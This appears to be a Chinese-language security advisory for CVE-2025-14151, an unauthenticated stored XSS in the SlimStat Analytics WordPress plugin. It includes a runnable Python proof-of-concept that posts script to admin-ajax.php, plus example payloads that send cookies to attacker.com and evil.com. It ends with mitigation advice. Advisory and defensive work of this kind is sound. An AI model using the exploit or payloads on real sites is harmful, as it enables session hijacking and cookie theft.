CVE-2025-14151 | WordPress SlimStat Analytics插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14151

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SlimStat Analytics WordPress Plugin

漏洞概述

CVE-2025-14151是WordPress SlimStat Analytics插件中的一个高危存储型跨站脚本(XSS)漏洞。该漏洞存在于所有5.3.2及以下版本中，由于插件对用户提供的属性值缺乏足够的输入清理和输出转义，导致未经身份认证的攻击者可以通过slimtrack AJAX操作中的outbound_resource参数注入任意Web脚本。被注入的恶意脚本会永久存储在受影响的页面中，当任何用户访问这些页面时，恶意脚本将自动执行，可能导致会话劫持、敏感信息窃取、恶意重定向等严重安全问题。由于该漏洞无需认证即可利用，且影响所有使用该插件的WordPress站点，因此具有较高的安全风险。

技术细节

该漏洞的根本原因在于SlimStat Analytics插件的slimtrack AJAX处理函数未对outbound_resource参数进行充分的输入验证和输出编码。攻击者可以通过构造包含恶意JavaScript代码的HTTP请求来触发漏洞。当插件记录用户访问数据时，未经过滤的用户输入被直接存入数据库。随后，当管理员或其他用户访问包含该数据的页面时，浏览器会解析并执行注入的恶意脚本。攻击者可以利用此漏洞窃取管理员Cookie、劫持用户会话、在受害者浏览器中执行任意JavaScript代码，甚至可能进一步利用获取的管理员权限进行更深层的攻击。由于slimtrack是AJAX动作，攻击者可以通过向wp-admin/admin-ajax.php发送POST请求来触发漏洞，无需任何认证。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站是否安装并启用了SlimStat Analytics插件（版本<=5.3.2）

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的outbound_resource参数，通过POST请求发送到wp-admin/admin-ajax.php

STEP 3

步骤3

插件接收到请求后，由于缺乏输入过滤，将恶意脚本未经转义直接存入数据库

STEP 4

步骤4

当管理员或用户访问包含该数据的页面时，浏览器解析并执行存储的恶意脚本

STEP 5

步骤5

恶意脚本执行后可窃取用户Cookie、会话令牌，或执行其他恶意操作完成攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-14151 PoC - Stored XSS in SlimStat Analytics
# Target: WordPress site with SlimStat Analytics plugin <= 5.3.2

import requests
import sys

def exploit_slimstat_xss(target_url, payload):
    """
    Exploit stored XSS via slimtrack AJAX action
    """
    ajax_url = target_url.rstrip('/') + '/wp-admin/admin-ajax.php'
    
    data = {
        'action': 'slimtrack',
        'outbound_resource': f'<script>alert("XSS")</script>{payload}'
    }
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        print(f'[+] Request sent to {ajax_url}')
        print(f'[+] Status: {response.status_code}')
        
        if response.status_code == 200:
            print('[+] Payload may have been stored successfully')
            print('[+] Visit any page with SlimStat reports to trigger XSS')
        
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f'Usage: python {sys.argv[0]} <target_url> <payload>')
        print('Example: python exploit.py http://example.com "alert(document.cookie)"')
        sys.exit(1)
    
    target = sys.argv[1]
    payload = sys.argv[2]
    exploit_slimstat_xss(target, payload)

# Example payloads:
# 1. Basic XSS: <script>alert('XSS')</script>
# 2. Cookie stealing: <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
# 3. Session hijacking: <img src=x onerror="fetch('https://evil.com/log?cookie='+btoa(document.cookie))">

影响范围

SlimStat Analytics WordPress Plugin <= 5.3.2

防御指南

临时缓解措施

如果无法立即升级插件，可以采取以下临时缓解措施：1)暂时禁用SlimStat Analytics插件；2)使用Web应用防火墙(WAF)规则阻止包含<script>标签或javascript:协议的outbound_resource参数请求；3)限制非管理员用户访问SlimStat报告页面；4)实施严格的CSP策略减少XSS影响；5)监控wp-admin/admin-ajax.php的异常请求模式。